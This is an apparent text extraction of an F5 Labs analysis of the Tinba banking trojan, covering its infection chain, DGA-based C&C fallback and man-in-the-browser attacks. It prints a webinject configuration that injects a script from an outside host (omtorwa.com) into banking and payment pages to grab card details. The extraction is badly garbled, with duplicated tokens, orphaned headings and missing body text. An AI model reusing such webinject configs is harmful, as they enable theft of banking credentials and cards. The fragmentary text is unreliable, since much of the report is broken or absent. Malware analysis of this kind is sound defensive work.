table of contents 2 - f5.com
TRANSCRIPT
•
Table of Contents .................................................................................................................... 2
Table of Figures ....................................................................................................................... 2
THE THREAT ............................................................................................................................. 4 Trojans ............................................................................................................................................. 4 Script Injections ................................................................................................................................ 4
SUMMARY OF THE ATTACK ...................................................................................................... 4
MALWARE ANALYSIS DETAILS .................................................................................................. 6 Dropper Infection ............................................................................................................................. 6 Hooking System Functions ................................................................................................................ 6 Autorun Locations ............................................................................................................................ 7 Deployment on Disk ......................................................................................................................... 7 Hooking the Browsers and Lowering Security .................................................................................... 8 Rootkit ............................................................................................................................................. 8
Registry .................................................................................................................................................... 9 Files .......................................................................................................................................................... 9
Communication with C&C ............................................................................................................... 10 Downloading the Webinject Configuration File from the C&C .......................................................... 11 Posting Stolen Data To The Drop Zone............................................................................................. 12 The Configuration File ..................................................................................................................... 12 Configuration File Structure ............................................................................................................ 14 Tinba C&C Panel ............................................................................................................................. 14
MAN IN THE BROWSER INJECTIONS ........................................................................................ 15 Specially Crafted Online Banking Injections ..................................................................................... 15 Generic VBV Grabber ...................................................................................................................... 16 CC+VBV Grabber ............................................................................................................................. 17
ATSEngine Panel .................................................................................................................................... 19 Stolen Credentials ................................................................................................................................. 19
TINBA DETAILS AND DETECTION RATIO ................................................................................... 19 Anti-Virus Scanning Results ............................................................................................................. 19 About F5 Labs ................................................................................................................................. 22
•
•
User
Bank
Spam Malware
Code Injection Login Credentials
Drop Zone Transfer Botmaster
The user re ceives spam email and gets
infected with Tinba malware
Tinba steals login credentials and injects malicious
HTML/JavaScript code into the user’s browser. The stolen
information is sent to the C&C server.
The attacker uses the stolen information for various
fraudulent activities such as performing transactions
and selling/ using stolen credit cards.
PROCESS NAME
PROCESS ID
THREAD ID
OPERATION PATH DETAIL
PROCESS NAME
PROCESS ID
OPERATION PATH DETAIL
•
•
•
PROCESS NAME
PROCESS ID
OPERATION PATH DETAIL
PROCESS NAME
PROCESS ID
OPERATION PATH DETAIL
Registry
Files
Figure 5 : The C: \ Documents and Settings \ Administrator \ Application Data \ 557 CEB7B \ folder as seen from IceSword.
The m alware uses a hard - coded algorithm to generate random domains to which it will send DNS queries. This gives the attackers the ability to install a new C&C server if an old one has been taken down by I nternet authorities. This way, the m alware can come back to life without the need to infect the bots with a new binary.
•
•
•
•
•
•
•
•
set_url *book* GP set_url *pay* GP data_before
data_before data_end data_end
data_inject data_inject <script> <script> var myComputer = "%BOTID%"; var myComputer = "%BOTID%"; </script> </script> <script <script
src="https://omtorwa.com/vbvgr/src/x.js"></sc src="https://omtorwa.com/vbvgr/src/x.js"></sc
ript> ript> data_end data_end
data_after data_after
</head> </head> data_end data_end
ATSEngine Panel
Stolen Credentials